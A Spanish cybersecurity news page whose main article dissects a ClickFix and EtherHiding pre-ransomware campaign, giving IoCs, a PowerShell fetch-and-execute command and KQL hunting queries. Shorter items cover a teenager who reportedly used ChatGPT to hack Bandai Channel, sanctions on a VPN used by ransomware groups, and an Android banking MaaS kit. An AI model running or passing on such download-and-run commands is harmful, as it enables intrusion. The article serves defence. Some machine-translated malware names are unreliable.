disección de una operación pre-ransomware como servicio – CYBERDEFENSA.MX

CIBER-TEC, En este artículo analizaremos una campaña, documentada por Unit 42, que industrializa la convergencia de tres mundos que hasta hace poco operaban por separado: la ingeniería social de ClickFix (inducir a la víctima a ejecutar un comando desde su propio equipo), un kit de malware como servicio (MaaS) llamado JokerStat con paneles de operador y soporte por Telegram, y una capa de comando y control resuelta en la blockchain de Polygon mediante la técnica EtherHiding. La cadena termina en staging previo a ransomware: robo de credenciales de LSASS, enumeración de Active Directory y auto-replicación. La actividad se solapa con operaciones atribuidas a Rapid Brigantine (Vanilla Tempest).

Tesis del artículo: esta operación no introduce una técnica inédita; ensambla varias con lógica de producto. La consecuencia defensiva es que las listas de bloqueo y el escaneo de archivos llegan tarde por diseño. El control efectivo se desplaza al eslabón humano, al egress y a la lectura del propio contrato en la cadena de bloques.

1. El contexto y la anatomía de la cadena

Lo relevante de esta campaña no es ninguna técnica aislada, sino cómo se ensamblan. Es un caso de estudio del modelo compartimentado que gobierna el ecosistema de ransomware actual, donde el acceso, la plataforma de entrega y la post-explotación son servicios independientes que se acoplan por transacción.

La secuencia completa recorre seis etapas. Un usuario llega a un sitio comprometido que le muestra una falsa verificación de seguridad; siguiendo las instrucciones, pega y ejecuta un comando de PowerShell que arranca toda la cadena. El payload viaja oculto en una imagen y se ejecuta en memoria sobre un proceso firmado y confiable. El malware pregunta a un contrato en la blockchain de Polygon cuál es su servidor de mando y control vigente, se conecta, persiste y comienza a preparar el terreno para el cifrado.

2. ¿Qué es ClickFix? Mecánica y por qué funciona

ClickFix es una técnica de acceso inicial que invierte la carga de la ejecución: en lugar de que el atacante entregue y detone un binario, es la propia víctima quien ejecuta el código malicioso en su equipo, convencida de que realiza un paso de verificación legítimo. El patrón se popularizó a mediados de 2024 y hoy es uno de los vectores de entrada de mayor crecimiento porque elude, de raíz, las defensas centradas en la descarga de archivos.

El mecanismo se apoya en tres piezas. Primero, un señuelo que imita una pantalla familiar y confiable —un desafío de Cloudflare, una actualización del navegador, un error de reproducción de video—. Segundo, la inyección silenciosa en el portapapeles: mediante JavaScript, la página coloca un comando en el portapapeles del usuario sin que este lo perciba. Tercero, unas instrucciones guiadas que llevan a la víctima a abrir una consola con privilegios y pegar el comando. En la campaña analizada, el señuelo instruye la secuencia Win+X, elegir Terminal, Ctrl+V y Enter.

El comando del portapapeles y el polimorfismo sintáctico

El comando pegado sigue un patrón reconocible: fija el protocolo de seguridad a TLS 1.2 y a continuación invoca iex(irm 'https:///dl/p/'), es decir, descarga la siguiente etapa del payload (el siguiente “stage”) desde un dominio de C2 y lo ejecuta en memoria. El detalle interesante para la ingeniería de detección es que el kit no emite un único comando, sino cinco variantes sintácticas equivalentes: enumeración explícita del protocolo, forma numérica abreviada (3072 equivale a TLS 1.2), banderas abreviadas (-ubp en lugar de -UseBasicParsing), sintaxis con operador de tubería (por ejemplo, 'https:///dl/p/' | iex en lugar de iex(irm ...)), y uso de la cadena de texto 'Tls12' en lugar del valor numérico para fijar el protocolo. Todas producen el mismo efecto, pero cambian la huella textual para degradar las reglas basadas en firmas estáticas. A esto se suma la rotación de los dominios de C2 y el uso de rutas con identificadores UUID por víctima.

¿Por qué funciona tan bien? Porque desplaza el punto de decisión desde la máquina hacia la persona y desde el archivo hacia una acción manual. No hay descarga que un navegador pueda bloquear ni adjunto que un gateway pueda detonar en sandbox; hay un ser humano copiando texto. Además, la ejecución interactiva en PowerShell deja una traza forense muy concreta —la clave de registro RunMRU— que, paradójicamente, es también una de las mejores oportunidades de detección.

3. El actor y la estructura de afiliados (JokerStat MaaS)

Detrás de la campaña no hay un actor monolítico, sino una cadena de suministro del cibercrimen. Conviene separar los roles porque cada uno se comercializa por separado y esa separación es, en sí misma, un rasgo defensivamente relevante.

La plataforma: JokerStat como kit MaaS

El elemento articulador de esta operación es JokerStat, un kit de malware como servicio. La evidencia es contundente: los quince dominios de C2 identificados sirven exactamente el mismo clon —una falsa página de acceso a un panel de analítica llamado JokerStat— y ofrecen incluso un canal de soporte por Telegram (@jokerstat_support) para los operadores que adquieren el kit. El propio código delata la marca: la variable de guarda que evita ejecuciones concurrentes de la captura de pantalla se llama __jks_screen_run_ (jks por JokerStat).

Este es el patrón del MaaS moderno, ya documentado en kits como Odyssey: un operador desarrolla y mantiene la plataforma —los paneles, la infraestructura de resolución, las páginas señuelo— y la alquila a afiliados que ejecutan las campañas. La consecuencia operativa es doble. Por un lado, homogeneiza los artefactos: el mismo clon y las mismas rutas aparecen en infraestructura distinta, lo que facilita el pivote y la caza para el defensor. Por el otro, desacopla la atribución: quien despliega el señuelo no es necesariamente quien desarrolla el kit ni quien ejecuta el ransomware final.

La post-explotación: solapamiento con Rapid Brigantine

La actividad posterior a la ejecución refleja de cerca operaciones atribuidas a Rapid Brigantine, un actor también conocido como Vanilla Tempest, DEV-0832, Vice Society y VICE SPIDER, activo desde al menos 2022 y asociado a familias de ransomware como Rhysida, BlackCat, Zeppelin y Quantum Locker. La formulación correcta es solapamiento conductual, no atribución concluyente: los TTP coinciden, pero en un modelo de afiliados el mismo conjunto de técnicas puede ser operado por manos distintas. Mantener esa cautela analítica es parte del rigor del informe, no una debilidad de este.

4. Blockchain en la cadena de ataque: EtherHiding sobre Polygon

Este es el corazón técnico de la operación y lo que la separa del ClickFix genérico. En lugar de codificar el servidor de C2 en el malware —donde sería un indicador fijo y bloqueable— el implante lo consulta en tiempo real a un contrato inteligente en la blockchain de Polygon. La técnica se conoce como EtherHiding.

Qué es EtherHiding y de dónde viene

EtherHiding fue documentada por primera vez por Guardio Labs en octubre de 2023, en el marco de la campaña ClearFake, y desde entonces la han adoptado actores cada vez más capaces, incluido un clúster norcoreano descrito por Google (Mandiant/GTIG) en octubre de 2025. La idea es tomar prestado un concepto del espionaje clásico —el resolutor de punto muerto o dead-drop resolver— y llevarlo a la cadena de bloques: en vez de conectarse directamente al C2, el malware primero consulta una fuente pública y legítima para averiguar cuál es el C2 vigente. Cuando esa fuente es un contrato inteligente, hereda todas las propiedades de la blockchain: es inmutable, está replicada globalmente y cualquiera puede leerla, incluido el malware.

Cómo funciona en esta campaña, paso a paso

El código de resolución implementa una función getServers() que itera una lista de ocho endpoints RPC públicos de Polygon —drpc.org, publicnode, 1rpc.io, QuickNode, OnFinality, Pocket Network, entre otros— y contra cada uno emite una llamada eth_call. Esa llamada invoca el método identificado por el selector 0x3bc5de30 sobre el contrato 0xf5966808a9ECbdb8794F568922809C52b0Fd2446. El contrato devuelve, codificada en su estado, la lista de dominios de C2 activos.

Tres decisiones de diseño merecen atención. La redundancia de endpoints —ocho RPC distintos— garantiza que bloquear uno o dos proveedores no interrumpa la resolución. El uso de eth_call, que es una llamada de solo lectura, significa que no se consume gas ni se genera una transacción: la consulta es gratuita, no deja rastro en el historial de transacciones del contrato y, sobre el cable, es indistinguible de la interacción de cualquier aplicación descentralizada legítima. Y la rotación se vuelve trivial para el atacante: con una sola transacción que reescribe el estado del contrato, cambia el C2 de toda la botnet simultáneamente.

Por qué importa: resiliencia frente a auditabilidad

El C2 on-chain invierte una premisa básica de los takedowns. El comando y control tradicional tiene un centro incautable —un dominio, una IP, un servidor—. Aquí no lo hay: el punto de resolución vive en un contrato inmutable que no admite sinkholing ni puede darse de baja. Para el defensor, esto significa que perseguir los dominios resueltos es una carrera perdida, porque son efímeros y se reemplazan con una transacción.

Este patrón no es teórico ni marginal. En abril de 2026, The DFIR Report documentó una intrusión en la que un malware que resolvía su C2 desde contratos —EtherRAT— derivó, a través de un framework de C2, en el despliegue del ransomware The Gentlemen. La clase de infraestructura que aquí se analiza es la misma que termina en cifrado a escala empresarial.

El arma de doble filo. La misma inmutabilidad que protege al atacante lo expone. El estado del contrato es público, permanente y con marca de tiempo. Leer el historial de escrituras del contrato enumera todos los dominios de C2 que han estado activos y revela el ritmo de operación del actor. La lectura correcta es contraintuitiva: el dominio resuelto es el indicador más débil y la dirección del contrato es el indicador más fuerte y perdurable. Ese es el pivote de detección y atribución que el atacante no puede borrar.

5. Técnicas de evasión

Más allá del C2 en blockchain, la operación acumula varias capas de evasión que conviene entender por separado, porque cada una anula una familia distinta de controles.

Esteganografía en PNG y ejecución en memoria con Donut

El payload no viaja en claro: se oculta dentro de los datos de píxel de una imagen PNG. Un loader .NET reconstruye desde esos píxeles un shellcode empaquetado con Donut —un framework legítimo de red team que convierte ejecutables .NET o PE en shellcode de posición independiente— y lo ejecuta directamente en memoria. En disco solo queda una imagen estadísticamente normal, lo que anula el escaneo estático de archivos.

DLL sideloading sobre binario firmado

El proceso que ejecuta el shellcode es un binario de Microsoft legítimamente firmado, al que se le hace cargar una DLL maliciosa por sideloading. El resultado es que la actividad hereda la reputación del binario firmado: la telemetría deja de decir “binario desconocido” y pasa a decir “carga de módulo en un proceso confiable”, un evento mucho más difícil de priorizar para un EDR basado en reputación.

Exfiltración de pantalla y reinyección dinámica del portapapeles

El kit incluye dos capacidades adicionales. La primera es la exfiltración de capturas de pantalla: usando html2canvas, el implante renderiza la página visible, la serializa como JPEG en base64 y la envía por POST al endpoint /collect/screen del C2, repitiéndolo cada 120 segundos. La segunda es la inyección dinámica del portapapeles: el implante consulta el endpoint /cload —parametrizado con un identificador, el sistema operativo y el hostname de la víctima— y ejecuta como script el contenido devuelto, que a su vez reescribe el portapapeles. Esto permite al operador cambiar el comando ClickFix servido a cada víctima sin tocar la página, de forma segmentada y en caliente.

Polimorfismo, rotación y persistencia resistente al aislamiento

A las anteriores se suman el polimorfismo sintáctico del payload (las cinco variantes ya descritas), la rotación de quince dominios de C2 registrados con poca antelación, y un rasgo especialmente incómodo para la respuesta a incidentes: en al menos un caso documentado, la persistencia siguió relanzándose durante horas después de aislar el host en red. El aislamiento del EDR no cortó el mecanismo de relanzamiento local, lo que obliga a tratar el aislamiento como contención temporal y no como erradicación.

6. Post-explotación y staging pre-ransomware

La fase final es un manual de preparación de impacto. Se observa volcado de credenciales desde el proceso LSASS, enumeración por LDAP de administradores de dominio y de equipos, y auto-replicación del código en directorios con nombres aleatorizados. Ese trío —robo de credenciales, mapeo de Active Directory y propagación— no corresponde a un infostealer que exfiltra y se marcha, sino al reconocimiento de dominio con intención de movimiento lateral y despliegue masivo de cifrado. Es, en términos prácticos, la antesala del ransomware, y es también la última ventana de detección limpia antes del cifrado.

7. Indicadores de compromiso (IoC)

Los siguientes indicadores provienen de la investigación de Unit 42 y de la evidencia analizada. Deben verificarse contra su vigencia antes de operacionalizarlos, dada la rotación descrita; el indicador más perdurable no es ningún dominio, sino la dirección del contrato.

Tipo Indicador / valor
Contrato C2 (Polygon) 0xf5966808a9ECbdb8794F568922809C52b0Fd2446
Selector de método 0x3bc5de30 (invocado vía eth_call)
Dominios de C2 morganstat.sbs · massstat.co · stroinnetsata.biz · xverikstat.us · okliimnwq.co (parte de ~15)
Rutas / endpoints /dl/p/ · /collect/screen · /cload?k=&os=&h=
Artefacto de host __jks_screen_run_ (variable de guarda; marca del kit JokerStat)
Soporte del kit Telegram @jokerstat_support
Payload PowerShell iex(irm 'https:///dl/p/' -UseBasicParsing)

8. Mapeo a MITRE ATT&CK

Táctica Técnica Aplicación
Initial Access T1189 Drive-by Compromise Falsa actualización SocGholish en WordPress comprometido
Execution T1204.004 · T1059.001 ClickFix → PowerShell ejecutado por la víctima
Defense Evasion T1027.003 Steganography Shellcode Donut oculto en píxeles de un PNG
Defense Evasion T1574.002 DLL Side-Loading Binario Microsoft firmado carga una DLL maliciosa
Defense Evasion T1055 Process Injection Ejecución del shellcode en memoria
Command & Control T1102 · T1568 (EtherHiding) Contrato en Polygon como dead-drop resolver + dominios rotatorios
Collection T1113 Screen Capture Exfiltración de pantalla con html2canvas cada 120 s
Collection / Exec T1115 Clipboard Data Inyección y reescritura dinámica del portapapeles
Credential Access T1003.001 LSASS Memory Volcado de credenciales del proceso LSASS
Discovery T1018 · T1069 (LDAP) Enumeración de administradores de dominio y equipos
Impact (staging) T1486 (preparación) Auto-replicación y preparación del cifrado

9. Recomendaciones de protección

Las contramedidas se ordenan por dominio de control y por su resistencia frente a la evasión específica de esta cadena. El criterio rector es concreto: cada medida ataca un eslabón identificado y se explica por qué funciona, evitando la recomendación genérica.

C1 — Cortar el eslabón humano en el endpoint

Es la medida de mayor impacto y menor fricción, porque toda la cadena depende de que un usuario ejecute PowerShell interactivo. Restringir o auditar el diálogo Ejecutar y el acceso a la Terminal para cuentas estándar mediante GPO; desplegar reglas ASR de Microsoft Defender que bloqueen la creación de procesos hijos desde el navegador y la ejecución de contenido ofuscado; y habilitar el registro de PowerShell (ScriptBlock y Module Logging) junto con Constrained Language Mode. Si la ejecución interactiva está gobernada por política, la cadena se rompe en su primer eslabón.

C2 — Gobernar el egress y vigilar la resolución en blockchain

La lección de EtherHiding es que bloquear dominios es insuficiente por diseño. La contramedida realista tiene dos frentes. En el egress: proxy con inspección y bloqueo de tráfico RPC/Web3 no autorizado hacia nodos de blockchain (Polygon, BSC, Ethereum) desde procesos que no son navegadores ni carteras legítimas; y filtrado de dominios de registro muy reciente (NRD). En inteligencia on-chain: incorporar la dirección del contrato como indicador de vigilancia y leer periódicamente su historial de estado para enumerar los C2 vigentes e históricos, convirtiendo la inmutabilidad del atacante en telemetría propia.

C3 — Endurecer el endpoint contra la evasión en memoria

Frente a la ejecución en memoria y al sideloading sobre binarios firmados, la firma de fichero deja de bastar: el EDR debe apoyarse en protección conductual y detección de inyección en memoria, no solo en reputación. Para el robo de credenciales, activar la protección de LSASS (RunAsPPL / LSA Protection), Credential Guard donde el hardware lo permita, y la regla ASR que bloquea el volcado de credenciales desde LSASS.

C4 — Redefinir la contención en respuesta a incidentes

Dado que la persistencia sobrevivió al aislamiento, la contención de red debe acompañarse de una erradicación local verificada: enumeración de tareas programadas, claves Run/RunOnce, servicios y watchdogs antes de declarar contenido el host. Se asume persistencia redundante y se trata el aislamiento como medida temporal, no como estado final del incidente.

C5 — Cazar la actividad post-explotación como red de seguridad

Si la evasión temprana tuvo éxito, la fase de reconocimiento de dominio es la última oportunidad limpia antes del cifrado. Monitorear accesos anómalos a lsass.exe, ráfagas de consultas LDAP enumerando grupos privilegiados y objetos de tipo equipo, y creación de archivos replicados en directorios aleatorizados. Son señales que la esteganografía y el C2 en blockchain no pueden ocultar.

10. Detección e ingeniería de cacería

La detección de mayor valor es la del acto ClickFix en sí, porque es el eslabón que la víctima no puede ocultar. Windows registra los comandos ejecutados desde el diálogo Ejecutar en la clave RunMRU, lo que permite parsear entradas en busca de uso sospechoso. Las siguientes consultas son puntos de partida —no reglas de producción— para orientar la cacería.

KQL · Cadena parental anómala (Defender / Sentinel)

// PowerShell / mshta / rundll32 lanzados por el navegador o Explorer
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("explorer.exe","chrome.exe","msedge.exe")
| where FileName in~ ("powershell.exe","mshta.exe","rundll32.exe")
| where ProcessCommandLine has_any ("irm","iex","-enc","-ubp","UseBasicParsing","3072")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine

KQL · Egress hacia RPC de blockchain desde procesos no-navegador

// Conexiones a nodos RPC (Polygon/BSC/Ethereum) fuera de navegadores y wallets
DeviceNetworkEvents
| where RemoteUrl has_any ("drpc.org","publicnode.com","1rpc.io","quiknode.pro",
        "onfinality.io","pocket.network","rpc.polygon")
| where InitiatingProcessFileName !in~ ("chrome.exe","msedge.exe","firefox.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl

KQL · Acceso sospechoso a LSASS

DeviceEvents
| where ActionType == "OpenProcessApiCall"
| where FileName =~ "lsass.exe"
| where InitiatingProcessFileName !in~ ("MsMpEng.exe","wmiprvse.exe")
| summarize count() by DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath

Como complemento, tres señales de alto rendimiento cierran el espectro: binarios firmados de Microsoft que cargan DLLs desde rutas de usuario no estándar (%APPDATA%, %TEMP%, directorios aleatorizados); tráfico saliente periódico y regular hacia el endpoint /collect/screen o patrones POST con cuerpos JPEG en base64; y el monitoreo directo, en un explorador de bloques, de la dirección del contrato para alertar sobre cada nueva escritura de estado —es decir, sobre cada rotación de C2 en el momento en que ocurre.

Esta operación no destaca por inventar, sino por integrar con criterio de producto. Ensambla ingeniería social de portapapeles, un kit MaaS con paneles y soporte, evasión en memoria y un C2 en blockchain, y lo orquesta hacia un único fin: el cifrado. Su significado para la postura de riesgo institucional es que consolida un patrón donde la entrega es barata y comoditizada, la evasión es de grado ofensivo y la infraestructura de control resiste los takedowns. Una defensa organizada por firmas y listas de bloqueo llega, estructuralmente, tarde.

La respuesta correcta no es acumular herramientas, sino reordenar los controles alrededor de tres verdades que esta cadena deja expuestas. El eslabón más frágil del atacante es la ejecución humana del comando, y ahí conviene concentrar la fricción. La resolución del C2 vive fuera de la infraestructura incautable, de modo que el egress y la lectura del propio contrato se convierten en el punto de control real. Y la contención por aislamiento es una ilusión si no se acompaña de erradicación local verificada. El defensor que internalice esas tres ideas no necesita anticipar cada variante futura: le basta con cerrar las condiciones que todas comparten. La misma inmutabilidad que hace invencible el C2 del atacante es, leída al revés, el registro público que lo delata.

Fuentes y referencias

  1. Unit 42, Palo Alto Networks — ClickFix campaign utilizing MaaS kit with Blockchain C2 (Timely Threat Intelligence, 2026-07-02).
  2. Unit 42, Palo Alto Networks — Fix the Click: Preventing the ClickFix Attack Vector.
  3. Unit 42, Palo Alto Networks — The ClickFix Factory: First Exposure of IUAM ClickFix Generator (modelo MaaS/afiliados; Odyssey).
  4. Unit 42, Palo Alto Networks — 2026 Global Incident Response Report (ClickFix, ejecución en memoria, cadena hacia ransomware).
  5. Guardio Labs — EtherHiding: Hiding Web2 Malicious Code in Web3 Smart Contracts (divulgación original, 2023).
  6. Google Threat Intelligence Group / Mandiant — DPRK Adopts EtherHiding (UNC5342, dead-drop resolver, oct. 2025).
  7. The DFIR Report — EtherRAT → TukTuk C2 → The Gentlemen ransomware (C2 on-chain con desenlace en ransomware, abr. 2026).
  8. BlueVoyant — Lorem Ipsum, ClickFix Pivot & Rapid Brigantine. Sekoia.io — Unveiling ErrTraffic (ClickFix + EtherHiding MaaS).
  9. Huntress — ClickFix Gets Creative: Malware Buried in Images. Silent Push — Unmasking SocGholish and its operator TA569.
  10. MITRE ATT&CK — matriz empresarial de tácticas y técnicas.

Autor: Nahum Deavila. Fuente primaria: Unit 42, Palo Alto Networks.

FUENTE: CIBER-TEC

Un hacker adolescente piratea el servicio de streaming de Bandai usando ChatGPT – CYBERDEFENSA.MX

La policía japonesa ha llevado a cabo la detención de un estudiante de secundaria de 15 años residente en la ciudad de Tokorozawa, prefectura de Saitama, bajo sospecha de obstrucción fraudulenta de negocios.

El pirata informático, presuntamente, habría utilizado utilizado un programa asistido por ChatGPT para lanzar un ciberataque sostenido contra Bandai Channel, el popular servicio de streaming de anime y tokusatso operado por Bandai Namco Filmworks. 

Según apuntan las investigaciones, el pequeño hacker obtuvo acceso no autorizado a los servidores de la compañía nipona en noviembre y canceló sistemáticamente las inscripciones de 46.812 de sus miembros, provocando retiradas masivas de fondos. 

Bandai Namco Filmworks llegó a paralizar temporalmente todos los servicios de la plataforma y cortó el acceso a toda su base de usuarios mientras investigaba la brecha de seguridad. 

El hacker usó ChatGPT para crear un programa personalizado que automatizara el acceso no automatizado a las cuentas de los usuarios, forzando su eliminación a gran escala. 

Durante sus intrusiones, el pirata informático obtuvo igualmente información personal de los miembros, incluyendo direcciones de email y apodos. 

Bandai Namco Filmworks ha declarado que, hasta el momento, no hay evidencia confirmada de que estos datos se hayan filtrado públicamente o se hayan utilizado para fraudes secundarios.

«Nos esforzaremos por evitar que esto vuelva a ocurrir reforzando aún más nuestro sistema de gestión de seguridad, incluida la gestión de la seguridad de la información, para que nuestros miembros puedan utilizar nuestros servicios con total tranquilidad», ha señalado la compañía en un comunicado. 

El hacker admitió los cargos de los que se le acusan durante el interrogatorio y llegó a comentar que no «guardaba rencor contra las empresas víctimas». Es decir, de esto se deduce que el incidente no habría estado motivado por un objetivo económico, sino más bien por curiosidad técnica o por el interés de demostrar una capacidad. 

Jóvenes, curiosos y bien armados

Sea como fuere lo ocurrido pone de manifiesto las posibilidades que la IA generativa está ofreciendo para hacer el cibermal, incluso a piratas informáticos con pocos conocimientos técnicos o edades muy jóvenes e inclinaciones autodidactas. 

Un medio local cuenta cómo el chaval comenzó a aprender programación de manera independiente alrededor del cuarto grado, lo que le habría permitido ir adquiriendo habilidades. Las pocas barreras de entrada que tiene la herramienta de OpenAI habrían hecho el resto. 

EE.UU. sanciona al primer vendedor de criptomoneda de malware y servicio VPN por soporte de ransomware – CYBERDEFENSA.MX

La Oficina de Control de Activos Extranjeros (OFAC) del Departamento del Tesoro de Estados Unidos ha designado dos personas y un proveedor de servicios VPN para permitir las actividades maliciosas de los actores de ransomware y otros ciberdelincuentes, incluidos los ataques de ransomware contra estadounidenses.

La VPN, llamada Primer servicio VPN (1VPN), ha sido acusado de ofrecer sus herramientas a grupos de ransomware, junto con su administrador ucraniano de 45 años, Dmytro Rashevskyi. El departamento también sancionó a Yegeniy Vladimirovich Silayev, un ciudadano bielorruso, por vender cifrados para ayudar a ocultar ransomware y otro malware como programas seguros para evitar ser detectados por herramientas de seguridad.

La primera VPN fue desmantelada en mayo de 2026 como parte de una operación conjunta de aplicación de la ley por parte de las autoridades europeas y norteamericanas para ayudar a los actores criminales a ocultar los orígenes de los ataques de ransomware, robo de datos, escaneo y ataques de denegación de servicio. El servicio ha estado operativo desde 2014, anunciando que no mantiene un registro de las identidades o actividades de los usuarios ni coopera con las autoridades para abordar las actividades ilegales que se originan en los servidores que alquila a los clientes.

Según el Tesoro, se dice que varios grupos de ransomware compraron First VPN para llevar a cabo ataques a empresas e instituciones estadounidenses y ocultar sus verdaderos orígenes, implementar malware y gestionar datos exfiltrados. Las víctimas de ataques de ransomware que involucraron la infraestructura VPN incluyeron empresas estadounidenses, empresas de servicios financieros, hospitales y gobiernos municipales.

Los grupos de ransomware que utilizan servicios proporcionados por las partes designadas supuestamente causaron miles de millones de dólares en pérdidas a empresas estadounidenses y proveedores de infraestructura crítica, dijeron funcionarios estadounidenses.

Ciberseguridad

«Rashevskyi ha utilizado identidades falsas, incluidas ‘Maksim Sorin’ y ‘Roman Chabanenko’, para comprar infraestructura de empresas que de otro modo podrían negarse a hacer negocios con él debido a quejas de abuso por parte de proveedores de servicios de Internet sobre actividades ilegales originadas en los servidores 1VPNS», dijo el departamento.

El Reino Unido y la UE imponen sanciones a personas y entidades rusas

La revelación coincide con las sanciones del Reino Unido y la UE a las redes cibernéticas rusas por sus «intentos persistentes y cada vez más imprudentes de sembrar caos y división en toda Europa». Las sanciones se dirigen a 24 personas y entidades detrás de operaciones cibernéticas e híbridas destructivas, incluidos operadores involucrados en redes proxy vinculadas a los Servicios de Inteligencia Rusos (RIS).

Esto incluye a los altos dirigentes de la Dirección Principal de Inteligencia (GRU) de Rusia, Vyacheslav Stafeyev, Ivan Senin e Ivan Kasyanenko, por su papel en la dirección de las operaciones de amenazas híbridas y cibernéticas del GRU. En conjunto, Al Centro 16 del Servicio Federal de Seguridad (FSB) se le atribuyen operaciones de sabotaje perturbadoras contra la red eléctrica de Polonia a finales del año pasado.

«La división cibernética de la Unidad 29155 de GRU trabajó con ciberdelincuentes, incluida la empresa IMPULS, para reclutar piratas informáticos y especialistas cibernéticos de universidades y academias de toda Rusia», dijo el gobierno del Reino Unido. dicho.

Las sanciones también están dirigidas a las personas detrás de Lumma Stealer por permitir a los ciberdelincuentes recopilar información confidencial a gran escala de dispositivos comprometidos. Se dice que Rusia utilizó las credenciales robadas del ladrón para llevar a cabo operaciones de ciberespionaje contra objetivos en todo el mundo para apoyar los objetivos del Kremlin.

«Los ciberdelincuentes, los autoproclamados hacktivistas y las empresas privadas vinculadas a Rusia, incluidos los actores que operan bajo sus instrucciones, dirección o control, también han llevado a cabo, habilitado y facilitado una amplia gama de actividades maliciosas», afirmó la UE. dicho.

Ciberseguridad

«Condenamos enérgicamente el comportamiento de Rusia y el uso indebido de este ecosistema cibernético, dirigido a servicios públicos e infraestructura crítica, causando perturbaciones y pérdidas financieras. Al denunciar el comportamiento malicioso de Rusia e imponer costos a los responsables de tales actividades, la UE subraya su determinación de defender la rendición de cuentas en el ciberespacio».

Los objetivos patrocinados por el Estado ruso van tras los enrutadores

Las sanciones también llegan contra el fondo de un nuevo aviso emitido por la Oficina Federal de Investigaciones (FBI) de EE. UU. sobre la explotación por parte de ciberactores del FSB Center 16 de dispositivos de red vulnerables y mal configurados en todo el mundo para piratear de manera oportunista múltiples redes del sector de infraestructura crítica.

«Los ciberactores del Centro FSB ruso 16 utilizan principalmente el escaneo para identificar dispositivos de red mal configurados, principalmente enrutadores, para su explotación», dijo la agencia. «Los actores buscan rangos de IP de Internet con agentes activos del Protocolo simple de administración de red (SNMP) que aceptan cadenas de comunidad comunes o predeterminadas para la autenticación».

Estos análisis, que se ejecutan a través de servidores proxy, consisten en solicitudes de configuración SNMP desde una dirección IP falsificada que contiene identificadores de objetos (OID) que indican al agente SNMP en dispositivos de red mal configurados que copie su configuración en un archivo y la transfiera a un servidor privado virtual (VPS) controlado por un atacante o a un servidor FTP comprometido.

La actividad también implica abusar de vulnerabilidades y exposiciones comunes (CVE) en dispositivos Cisco, como CVE-2018-0171 y CVE-2008-4128como una forma de descubrir y explotar dispositivos de red mal configurados. Desde entonces, la Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) ha agregado CVE-2008-4128 a sus vulnerabilidades explotadas conocidas (KEV) catálogo, lo que requiere que las agencias federales apliquen las correcciones antes del 16 de julio de 2026.

RedWing MaaS empaqueta el fraude bancario de Android como un servicio de alquiler de Telegram – CYBERDEFENSA.MX

Una nueva operación de malware para Android llamada Malvís se alquila en Telegram como un servicio de fraude bancario ya preparado. Permite que incluso delincuentes poco capacitados se apoderen del teléfono de la víctima, roben sus inicios de sesión bancarios y capturen los códigos de un solo uso que protegen sus cuentas.

Los zLabs de Zimperiumque descubrió la operación, dice que parece una nueva variante de Olvidouna herramienta de alquiler de malware de 300 dólares al mes documentada a principios de este año.

RedWing se vende como un producto completo, en niveles de suscripción con descuentos por referencias, guías y videos instructivos, por lo que el comprador no necesita habilidades para escribir malware. Un bot de Telegram crea para cada comprador una aplicación personalizada a pedido.

Los investigadores dicen que una cantidad sustancial de los droppers y cargas útiles resultantes actualmente evaden las herramientas de seguridad convencionales.

La infección comienza con un enlace de phishing que abre una página falsa de una tienda de aplicaciones. El creador de cuentagotas del kit puede imitar Google Play, Galaxy Store y AppGallery, o crear páginas totalmente personalizadas, con calificaciones, reseñas y recuentos de descargas falsos. Luego, la página convence al usuario para que instale la aplicación desde fuera de la tienda oficial y apruebe sus permisos.

Ciberseguridad

La aplicación presenta sus solicitudes de permiso una pantalla a la vez. Una página web de apariencia inofensiva se encuentra en segundo plano mientras las tarjetas emergentes solicitan permisos enmarcados como rutinarios: desactivar los límites de batería, configurar la aplicación como el administrador de mensajes de texto predeterminado y activar las notificaciones.

También solicita activar el servicio de Accesibilidad de Android, del que el malware abusa para leer la pantalla y controlar el teléfono.

Con esos permisos, RedWing tiene un amplio control del teléfono. Sus capacidades incluyen:

  • Pantallas de inicio de sesión falsas, llamadas superposiciones, que aparecen sobre aplicaciones bancarias y de criptomonedas reales para robar contraseñas.
  • Leer mensajes de texto entrantes para obtener contraseñas de un solo uso y usar Accesibilidad para eliminar códigos, números de tarjetas y PIN de la pantalla a medida que aparecen.
  • Cambia silenciosamente las llamadas entrantes de la víctima al atacante, utilizando un código de operador oculto (*21*) para activar el desvío de llamadas, lo que anula la verificación telefónica y las llamadas de verificación de fraude bancario.
  • Transmisión de pantalla en vivo y registrador de teclas, para que los operadores puedan ver y controlar el teléfono en tiempo real.
  • Encender la cámara y el micrófono, leer archivos, robar contactos y registros de llamadas y rastrear la ubicación.
  • Agrupar teléfonos infectados para inundar de tráfico un sitio web objetivo, un ataque de denegación de servicio.

Los compradores eligen sus propios objetivos y el malware los divide en dos. Las aplicaciones que observa a través de Accesibilidad están incorporadas en cada copia, lo que indica que se crea una aplicación nueva a pedido una vez que el comprador elige los objetivos. Los objetivos superpuestos, por el contrario, se pueden cambiar más tarde desde el panel de control sin tener que abrir una nueva aplicación.

Zimperium contó 82 instituciones objetivo en varios sectores, con un fuerte enfoque en las empresas financieras rusas, aunque esa lista puede cambiar en cualquier momento. La evidencia apunta al mercado ruso: una muestra utilizó una página falsa de RuStore de Rusia. Los expertos dicen que la operación parece estar vinculada a actores de amenazas rusos, pero no llegan a confirmarla.

RedWing encaja en un movimiento más amplio en los delitos de Android hacia el fraude en el dispositivo, donde los atacantes operan dentro de la propia sesión bancaria de la víctima en lugar de robar una contraseña para usarla en otro lugar.

Ciberseguridad

Los investigadores detectaron el año pasado un kit de alquiler casi idéntico en el mercado ruso, Fantasy Hub. Las mismas técnicas aparecen en Albiriox, dirigido a más de 400 aplicaciones financieras, y Klopatra, que utilizaba control remoto oculto y superposiciones falsas para vaciar cuentas mientras las víctimas dormían.

RedWing no necesita ningún exploit de Android. Sólo funciona cuando un usuario instala la aplicación desde fuera de una tienda oficial y aprueba las indicaciones, por lo que la primera línea de defensa es lo que sucede en el momento de la instalación. Para particulares:

  • Instale aplicaciones sólo desde tiendas oficiales y trate como sospechosa cualquier «actualización» que llegue mediante un enlace o mensaje de texto.
  • No active «instalar desde fuentes desconocidas» y no otorgue accesibilidad, controlador de mensajes de texto predeterminado o acceso de exención de batería a una aplicación sin una razón clara para necesitarla.
  • Esté atento a una aplicación que oculta su ícono después de instalarse, un truco común para permanecer fuera de la vista.

